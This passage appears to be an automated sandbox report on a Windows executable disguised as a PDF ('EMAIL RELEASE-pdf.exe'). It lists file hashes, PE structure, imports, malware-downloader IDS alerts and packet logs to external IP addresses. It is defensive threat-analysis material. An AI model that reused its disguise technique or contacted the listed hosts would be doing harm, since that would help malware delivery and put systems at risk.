                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:PK241200518-EMAIL RELEASE-pdf.exe
                                                                                                        File size:1'006'592 bytes
                                                                                                        MD5:6897b3d43af4aca3376a79d7169746db
                                                                                                        SHA1:fec918d4e90a3697a78931ac4dab8dc6da637afb
                                                                                                        SHA256:23659bb599448db31b14bf56938cae2970929167fa41ad9d7e35cae65c1b4a64
                                                                                                        SHA512:5a7dda8f4340a7b56400da996ed24862bdada176ce228b20f9807babfc870a5b00e4be4521ace0e3032b32c715bba543aef35db92c599879b81c0b9d38dbc582
                                                                                                        SSDEEP:24576:Zu6J33O0c+JY5UZ+XC0kGso6Fa71mhxHTCWY:bu0c++OCvkGs9Fa71m3H1Y
                                                                                                        TLSH:E225AD22B3DDC360CB669173BF69B7016EBF78610630B95B2F980D7DA950171262C7A3
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                                        File Icon

                                                                                                        Icon Hash:3570b480858580c5

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x427dcd
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x67606C38 [Mon Dec 16 18:06:48 2024 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:5
                                                                                                        OS Version Minor:1
                                                                                                        File Version Major:5
                                                                                                        File Version Minor:1
                                                                                                        Subsystem Version Major:5
                                                                                                        Subsystem Version Minor:1
                                                                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        call 00007F265866118Ah
                                                                                                        jmp 00007F2658653F54h
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push edi
                                                                                                        push esi
                                                                                                        mov esi, dword ptr [esp+10h]
                                                                                                        mov ecx, dword ptr [esp+14h]
                                                                                                        mov edi, dword ptr [esp+0Ch]
                                                                                                        mov eax, ecx
                                                                                                        mov edx, ecx
                                                                                                        add eax, esi
                                                                                                        cmp edi, esi
                                                                                                        jbe 00007F26586540DAh
                                                                                                        cmp edi, eax
                                                                                                        jc 00007F265865443Eh
                                                                                                        bt dword ptr [004C31FCh], 01h
                                                                                                        jnc 00007F26586540D9h
                                                                                                        rep movsb
                                                                                                        jmp 00007F26586543ECh
                                                                                                        cmp ecx, 00000080h
                                                                                                        jc 00007F26586542A4h
                                                                                                        mov eax, edi
                                                                                                        xor eax, esi
                                                                                                        test eax, 0000000Fh
                                                                                                        jne 00007F26586540E0h
                                                                                                        bt dword ptr [004BE324h], 01h
                                                                                                        jc 00007F26586545B0h
                                                                                                        bt dword ptr [004C31FCh], 00000000h
                                                                                                        jnc 00007F265865427Dh
                                                                                                        test edi, 00000003h
                                                                                                        jne 00007F265865428Eh
                                                                                                        test esi, 00000003h
                                                                                                        jne 00007F265865426Dh
                                                                                                        bt edi, 02h
                                                                                                        jnc 00007F26586540DFh
                                                                                                        mov eax, dword ptr [esi]
                                                                                                        sub ecx, 04h
                                                                                                        lea esi, dword ptr [esi+04h]
                                                                                                        mov dword ptr [edi], eax
                                                                                                        lea edi, dword ptr [edi+04h]
                                                                                                        bt edi, 03h
                                                                                                        jnc 00007F26586540E3h
                                                                                                        movq xmm1, qword ptr [esi]
                                                                                                        sub ecx, 08h
                                                                                                        lea esi, dword ptr [esi+08h]
                                                                                                        movq qword ptr [edi], xmm1
                                                                                                        lea edi, dword ptr [edi+08h]
                                                                                                        test esi, 00000007h
                                                                                                        je 00007F2658654135h
                                                                                                        bt esi, 03h
                                                                                                        jnc 00007F2658654188h

                                                                                                        Rich Headers

                                                                                                        Programming Language:
                                                                                                        • [ASM] VS2013 build 21005
                                                                                                        • [ C ] VS2013 build 21005
                                                                                                        • [C++] VS2013 build 21005
                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                        • [ASM] VS2013 UPD4 build 31101
                                                                                                        • [RES] VS2013 build 21005
                                                                                                        • [LNK] VS2013 UPD4 build 31101

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x2d3a8.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf50000x711c.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc0xc70000x2d3a80x2d400eaba64bd719ebe3e6cde0622269e342fFalse0.9525207182320442data7.915724735056287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0xf50000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_ICON0xc74580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                        RT_ICON0xc75800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                        RT_ICON0xc76a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                        RT_ICON0xc77d00x162cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.906800563777308
                                                                                                        RT_MENU0xc8dfc0x50dataEnglishGreat Britain0.9
                                                                                                        RT_STRING0xc8e4c0x594dataEnglishGreat Britain0.3333333333333333
                                                                                                        RT_STRING0xc93e00x68adataEnglishGreat Britain0.2747909199522103
                                                                                                        RT_STRING0xc9a6c0x490dataEnglishGreat Britain0.3715753424657534
                                                                                                        RT_STRING0xc9efc0x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                        RT_STRING0xca4f80x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                        RT_STRING0xcab540x466dataEnglishGreat Britain0.3605683836589698
                                                                                                        RT_STRING0xcafbc0x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                        RT_RCDATA0xcb1140x28d77data1.0003646427995003
                                                                                                        RT_GROUP_ICON0xf3e8c0x14dataEnglishGreat Britain1.2
                                                                                                        RT_GROUP_ICON0xf3ea00x14dataEnglishGreat Britain1.25
                                                                                                        RT_GROUP_ICON0xf3eb40x14dataEnglishGreat Britain1.15
                                                                                                        RT_GROUP_ICON0xf3ec80x14dataEnglishGreat Britain1.25
                                                                                                        RT_VERSION0xf3edc0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                        RT_MANIFEST0xf3fb80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                        PSAPI.DLLGetProcessMemoryInfo
                                                                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                        UxTheme.dllIsThemeActive
                                                                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                        Possible Origin

                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishGreat Britain

                                                                                                        Network Behavior

                                                                                                        Suricata IDS Alerts

                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-12-18T00:30:18.217728+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704132.226.8.16980TCP
                                                                                                        2024-12-18T00:30:21.706195+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704132.226.8.16980TCP
                                                                                                        2024-12-18T00:30:24.572922+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704132.226.8.16980TCP
                                                                                                        2024-12-18T00:30:28.135272+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704132.226.8.16980TCP
                                                                                                        2024-12-18T00:30:29.869960+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549727172.67.177.134443TCP
                                                                                                        2024-12-18T00:30:34.432138+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549733132.226.8.16980TCP
                                                                                                        2024-12-18T00:30:42.150983+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549744132.226.8.16980TCP

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 18, 2024 00:30:07.482887983 CET4970480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:07.602641106 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:07.602719069 CET4970480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:07.603033066 CET4970480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:07.722716093 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:14.667406082 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:14.674053907 CET4970480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:14.795376062 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:18.200440884 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:18.217727900 CET4970480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:18.337363005 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:21.703111887 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:21.706195116 CET4970480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:21.827487946 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:24.529366970 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:24.572921991 CET4970480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:24.968153000 CET49719443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:24.968204975 CET44349719172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:24.968575001 CET49719443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:24.978080034 CET49719443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:24.978091955 CET44349719172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:26.203104019 CET44349719172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:26.203282118 CET49719443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:26.208183050 CET49719443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:26.208199024 CET44349719172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:26.208597898 CET44349719172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:26.260266066 CET49719443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:26.301490068 CET49719443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:26.347346067 CET44349719172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:26.648008108 CET44349719172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:26.648065090 CET44349719172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:26.648180008 CET49719443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:26.652928114 CET49719443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:26.666933060 CET4970480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:26.788635969 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:28.088547945 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:28.103270054 CET49727443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:28.103319883 CET44349727172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:28.103401899 CET49727443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:28.103704929 CET49727443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:28.103719950 CET44349727172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:28.135272026 CET4970480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:29.313971043 CET44349727172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:29.316860914 CET49727443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:29.316890001 CET44349727172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:29.869944096 CET44349727172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:29.870009899 CET44349727172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:29.870089054 CET49727443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:29.870505095 CET49727443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:29.873279095 CET4970480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:29.874126911 CET4973380192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:29.993038893 CET8049704132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:29.993633986 CET8049733132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:29.993725061 CET4970480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:29.993752956 CET4973380192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:29.993885040 CET4973380192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:30.113697052 CET8049733132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:34.385238886 CET8049733132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:34.390578985 CET4974480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:34.432137966 CET4973380192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:34.511535883 CET8049744132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:34.511637926 CET4974480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:34.511796951 CET4974480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:34.633337021 CET8049744132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:40.511976957 CET8049744132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:40.517021894 CET4974480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:40.636533022 CET8049744132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:42.104749918 CET8049744132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:42.105880022 CET49763443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:42.105916977 CET44349763172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:42.106060982 CET49763443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:42.106338024 CET49763443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:42.106352091 CET44349763172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:42.150983095 CET4974480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:43.322640896 CET44349763172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:43.331242085 CET49763443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:43.331289053 CET44349763172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:43.774311066 CET44349763172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:43.774389982 CET44349763172.67.177.134192.168.2.5
                                                                                                        Dec 18, 2024 00:30:43.774483919 CET49763443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:43.775167942 CET49763443192.168.2.5172.67.177.134
                                                                                                        Dec 18, 2024 00:30:43.779261112 CET4974480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:43.780504942 CET4976980192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:43.900840998 CET8049744132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:43.901082993 CET4974480192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:43.901865005 CET8049769132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:43.901949883 CET4976980192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:43.902118921 CET4976980192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:44.023183107 CET8049769132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:48.299925089 CET8049769132.226.8.169192.168.2.5
                                                                                                        Dec 18, 2024 00:30:48.306471109 CET4978080192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:48.354018927 CET4976980192.168.2.5132.226.8.169
                                                                                                        Dec 18, 2024 00:30:48.426037073 CET8049780132.226.8.169192.168.2.5
